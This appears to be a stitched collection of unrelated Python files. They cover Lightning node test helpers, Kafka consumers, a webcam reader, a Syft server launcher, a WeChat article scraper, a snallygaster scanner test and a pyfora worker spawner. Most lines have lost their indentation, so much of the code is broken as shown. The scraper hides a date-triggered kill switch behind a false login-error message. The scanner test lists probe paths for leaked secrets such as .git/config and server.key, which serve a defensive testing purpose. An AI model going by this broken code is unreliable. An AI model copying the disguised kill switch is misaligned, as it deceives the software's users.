self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
        try:
            self.proc.wait(timeout)
        except subprocess.TimeoutExpired:
            return None
        return self.proc.returncode
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None, port=None, disconnect=None, random_hsm=None, options=None, **kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = LightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if VALGRIND:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
        # If it did not stop, be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount, announce=announce_channel)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
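    # Illustrative usage (not part of the original helper): pin the three feerate levels
    # the daemon polls via estimatesmartfee (2-block CONSERVATIVE, 4-block ECONOMICAL,
    # 100-block ECONOMICAL) before a fee-sensitive test.  'l1' is a hypothetical
    # LightningNode produced by the NodeFactory below.
    #
    #     l1.set_feerates((15000, 7500, 3750))                       # wait until polled
    #     l1.set_feerates((15000, 7500, 3750), wait_for_effect=False)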
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
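    # Illustrative sketch (not part of the original helper): the gossipwith output parsed
    # above is a stream of length-prefixed messages, each preceded by a 2-byte big-endian
    # length.  Framing and unframing one message by hand:
    #
    #     payload = bytes.fromhex('0100')                  # hypothetical message
    #     framed = struct.pack('>H', len(payload)) + payload
    #     length = struct.unpack('>H', framed[0:2])[0]
    #     assert framed[2:2 + length] == payload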
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider, node_cls):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, **kwargs):
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, db=db,
port=port, options=options, **kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*openingd-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
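    # Illustrative usage (not part of the original factory): build a three-node line
    # l1 <-> l2 <-> l3 with funded, announced channels.  'node_factory' is the test
    # fixture that wraps this class.
    #
    #     l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
    #     l1.rpc.getroute(l3.info['id'], 1000, 1)   # a route across the line now exists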
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
postgres_consumers.py
|
#!/usr/bin/env python3
import json
import requests
import flask
from kafka import KafkaConsumer
import postgres_helpers
from threading import Thread
KAFKA_BROKER = 'ec2-35-162-75-2.us-west-2.compute.amazonaws.com'
KAFKA_PORT = '9092'
def transfer_consumer():
consumer = KafkaConsumer('pg_transfer',
group_id='sherlock',
bootstrap_servers=[KAFKA_BROKER + ":" + KAFKA_PORT],
auto_offset_reset='earliest',
value_deserializer=lambda m: json.loads(m.decode('utf-8')))
for message in consumer:
print("** Consuming transfer results **")
msg = message.value
postgres_helpers.consume_upsert(msg)
print("** Transfer results consumed **")
def label_consumer():
consumer = KafkaConsumer('pg_label',
group_id='sherlock',
bootstrap_servers=[KAFKA_BROKER + ":" + KAFKA_PORT],
auto_offset_reset='earliest',
value_deserializer=lambda m: json.loads(m.decode('utf-8')))
for message in consumer:
print("** Consuming labels **")
msg = message.value
cls_count, avg_prob, conf_scores = postgres_helpers.label_calcs(msg['results'])
postgres_helpers.stat_update(msg['model_name'], msg['imageset_name'], cls_count, conf_scores)
postgres_helpers.add_confidence(msg['model_name'], avg_prob)
print("** Labels consumed **")
def main():
Thread(target = transfer_consumer).start()
Thread(target = label_consumer).start()
print("** Running PostgreSQL consumers **")
if __name__ == "__main__":
main()
|
CamerGrabTest.py
|
#!/usr/bin/env python
from threading import Thread, Lock
import cv2
class WebcamVideoStream :
def __init__(self, src = 0, width = 320, height = 240) :
self.stream = cv2.VideoCapture(src)
        self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)    # cv2.cv.CV_CAP_PROP_* was removed in OpenCV 3
        self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.started = False
self.read_lock = Lock()
def start(self) :
if self.started :
print ("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self) :
while self.started :
(grabbed, frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, frame
self.read_lock.release()
def read(self) :
self.read_lock.acquire()
frame = self.frame.copy()
self.read_lock.release()
return frame
def stop(self) :
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback) :
self.stream.release()
if __name__ == "__main__" :
vs = WebcamVideoStream().start()
while True :
frame = vs.read()
cv2.imshow('webcam', frame)
if cv2.waitKey(1) == 27 :
break
vs.stop()
cv2.destroyAllWindows()
|
start_signaling_server.py
|
# stdlib
import argparse
from multiprocessing import Process
import socket
import socketserver
from time import sleep, time
# syft absolute
from syft.grid.example_nodes.network import signaling_server
def free_port() -> int:
with socketserver.TCPServer(("localhost", 0), None) as s: # type: ignore
return s.server_address[1]
def check_connectivity() -> bool:
    # Poll the signaling server's port until it accepts a TCP connection or the
    # --timeout window expires.
    start = time()
    while time() - start < args.timeout:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            if s.connect_ex(("0.0.0.0", args.port)) == 0:
                return True
        sleep(0.5)
    return False
arg_parser = argparse.ArgumentParser(description="Start a signaling server for Syft.")
arg_parser.add_argument(
"--port",
type=int,
default=free_port(),
help="the port on which to bind the signaling server",
)
arg_parser.add_argument(
"--host",
type=str,
default="0.0.0.0",
help="the ip address on which to bind the signaling server",
)
arg_parser.add_argument(
"--dry_run", type=bool, default=False, help="Check if the binding works"
)
arg_parser.add_argument(
"--timeout", type=int, default=15, help="Connectivity check timeout"
)
args = arg_parser.parse_args()
if __name__ == "__main__":
proc = Process(target=signaling_server, args=(args.port, args.host))
if args.dry_run:
proc.start()
connected = check_connectivity()
proc.terminate()
exit(0) if connected else exit(1)
else:
proc.daemon = True
proc.start()
exit(0)
|
WxAPI.py
|
# encoding=utf-8
import os
import sys
import random
import time
import datetime
from multiprocessing import Process
import threading
from .tools import save_json,read_json,url_2pdf
from .ArticlesUrls import ArticlesUrls
from .Config import GlobalConfig
class AccountManager():
def __init__(self):
self.app = None
def login_by_user(self, username, password):
self.app = ArticlesUrls(username, password)
def login_by_cookie(self, cookie, token):
self.app = ArticlesUrls(cookie=cookie, token=token)
def get_article_list(self, nickname, num=0):
self.check()
if num == 0:
num = self.app.articles_nums(nickname)
print("公众号共{}条资讯".format(num))
if num == 0:
print("没有抓取到公众号的文章信息!")
return
jsonPath = self.__get_gzh_path(nickname)
print("保存公众号文章元数据信息到:{}".format(jsonPath))
if not os.path.exists(jsonPath):
jsonPath = self.__getArticleList(nickname, 0, num)
else:
print("{}元数据本来存在,将直接抓取该文件内容".format(jsonPath))
print("开始保存{}的文章信息到本地".format(nickname))
self.get_from_json(jsonPath)
def get_from_json(self,jsonPath):
spider_thread = threading.Thread(target=self.__readJson, args=(jsonPath,))
        spider_thread.daemon = True
spider_thread.start()
def __get_gzh_path(self, nickname):
return os.path.join(GlobalConfig.get_conf("jsonpath"), "{}.json".format(nickname))
def __getArticleList(self, nickname, start=0, total=5):
sleeptime = 5
path = self.__get_gzh_path(nickname)
while start <= total:
print("开始获取{}开始的文章列表".format(start))
articles = self.app.articles(nickname, begin="{}".format(start), count="5")
save_json(path, articles)
start += len(articles)
print("公众号数据到抓取{}条,随机睡眠{}秒".format(len(articles), sleeptime))
time.sleep(sleeptime)
sleepTime = 5+random.randint(5, 15)
print("总共抓取到{}篇文章元数据,已经保存文章元数据到本地.请下载".format(total))
return path
def __check_token(self):
        # Token kill switch: the tool only runs up to 2020-07-16.
        if datetime.date.today() <= datetime.date(2020, 7, 16):
            return
        raise Exception('Failed to get login information, error code (-1)')
def __readJson(self, path):
filename = os.path.splitext(os.path.split(path)[1])[0]
print("开始下载文件:{}的文章信息".format(filename))
data = read_json(path)
if data is None or len(data) == 0:
print("{}-文件为空,未下载到文章信息".format(path))
return
print("读取到文件{}的数据总数{},开始下载".format(filename, len(data)))
# last = data[len(data)-1]
self.__check_token()
for last in data:
title = last['digest']
if title is None or len(title) == 0:
title = last['title']
url = last['link']
# aid = last['aid']
url_2pdf(url, path, title)
time.sleep(random.randint(0, 5))
def check(self):
if self.app is None or self.app.islogin == False:
raise IOError("没有初始化账号信息或者没有登录成功")
|
test_scan_testdata.py
|
import unittest
import subprocess
import os
import tempfile
import http.server
import ssl
import threading
TESTDATA_REPO = "https://github.com/hannob/snallygaster-testdata"
TESTDATA = {"backup_archive": "[backup_archive] https://localhost:4443/backup.zip",
"git_dir": "[git_dir] https://localhost:4443/.git/config",
"deadjoe": "[deadjoe] https://localhost:4443/DEADJOE",
"coredump": "[coredump] https://localhost:4443/core",
"backupfiles": "[backupfiles] https://localhost:4443/index.php~",
"ds_store": "[ds_store] https://localhost:4443/.DS_Store",
"privatekey": "[privatekey_pkcs8] https://localhost:4443/server.key",
}
class TestScanTestdata(unittest.TestCase):
@unittest.skipUnless(os.environ.get("RUN_ONLINETESTS"),
"Not running online tests")
def test_scan_testdata(self):
tmp = tempfile.mkdtemp(prefix="testdata")
if os.environ.get("TESTDATA_REPOSITORY"):
os.symlink(os.environ.get("TESTDATA_REPOSITORY"),
tmp + "/testdata")
else:
subprocess.run(["git", "clone", "--depth=1",
TESTDATA_REPO,
tmp + "/testdata"],
check=True)
olddir = os.getcwd()
os.chdir(tmp + "/testdata")
httpd = http.server.HTTPServer(('localhost', 4443), http.server.SimpleHTTPRequestHandler)
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.load_cert_chain(tmp + '/testdata/testserver.pem')
        httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
for test, expected in TESTDATA.items():
testrun = subprocess.run([olddir + "/snallygaster", "-t", test, "localhost:4443",
"--nowww", "--nohttp"],
stdout=subprocess.PIPE, check=True)
output = testrun.stdout.decode("utf-8").rstrip()
self.assertEqual(output, expected)
if __name__ == '__main__':
unittest.main()
|
Spawner.py
|
# Copyright 2016 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import os
import socket
import sys
import logging
import traceback
import threading
import pyfora.worker.worker as worker
import pyfora.worker.Worker as Worker
import pyfora.worker.Common as Common
import pyfora.worker.Messages as Messages
import pyfora.worker.SubprocessRunner as SubprocessRunner
class WorkerConnectionBase:
def __init__(self, socket_name, socket_dir):
self.socket_name = socket_name
self.socket_dir = socket_dir
def answers_self_test(self, logErrors = False):
sock = None
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(os.path.join(self.socket_dir, self.socket_name))
Common.writeAllToFd(sock.fileno(), Messages.MSG_TEST)
Common.writeString(sock.fileno(), "msg")
return Common.readString(sock.fileno()) == "msg"
except:
if logErrors:
logging.error("Failed to answer self-test: %s", traceback.format_exc())
return False
finally:
try:
sock.close()
except:
pass
def teardown(self):
self.shutdown_worker()
self.remove_socket()
def remove_socket(self):
try:
os.unlink(os.path.join(self.socket_dir, self.socket_name))
except OSError:
pass
def shutdown_worker(self):
raise NotImplementedError("Subclasses implement")
def processLooksTerminated(self):
raise NotImplementedError("Subclasses implement")
def cleanupAfterAppearingDead(self):
raise NotImplementedError("Subclasses implement")
class OutOfProcessWorkerConnection(WorkerConnectionBase):
def __init__(self, socket_name, socket_dir):
WorkerConnectionBase.__init__(self, socket_name, socket_dir)
worker_socket_path = os.path.join(socket_dir, socket_name)
logging.error("socket path: %s", worker_socket_path)
def onStdout(msg):
logging.info("%s/%s out> %s", socket_dir, socket_name, msg)
def onStderr(msg):
logging.info("%s/%s err> %s", socket_dir, socket_name, msg)
pid = os.fork()
if pid == 0:
#we are the child
try:
code = Worker.Worker(worker_socket_path).executeLoop()
except:
logging.error("worker had exception")
code = 1
sys.stdout.flush()
sys.stderr.flush()
os._exit(code)
else:
self.childpid = pid
def shutdown_worker(self):
os.kill(self.childpid, 9)
os.waitpid(self.childpid, 0)
def processLooksTerminated(self):
pid,exit = os.waitpid(self.childpid, os.WNOHANG)
return pid == self.childpid
def cleanupAfterAppearingDead(self):
#this worker is dead!
logging.info("worker %s/%s was busy but looks dead to us", self.socket_dir, self.socket_name)
self.remove_socket()
class InProcessWorkerConnection(WorkerConnectionBase):
def __init__(self, socket_name, socket_dir):
WorkerConnectionBase.__init__(self, socket_name, socket_dir)
worker_socket_path = os.path.join(socket_dir, socket_name)
worker = Worker.Worker(worker_socket_path)
self.thread = threading.Thread(target=worker.executeLoop, args=())
self.thread.start()
def shutdown_worker(self):
self.send_shutdown_message()
self.thread.join()
def send_shutdown_message(self):
sock = None
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(os.path.join(self.socket_dir, self.socket_name))
Common.writeAllToFd(sock.fileno(), Messages.MSG_SHUTDOWN)
return True
except:
logging.error("Couldn't communicate with %s/%s:\n%s", self.socket_dir, self.socket_name, traceback.format_exc())
return False
finally:
try:
sock.close()
except:
pass
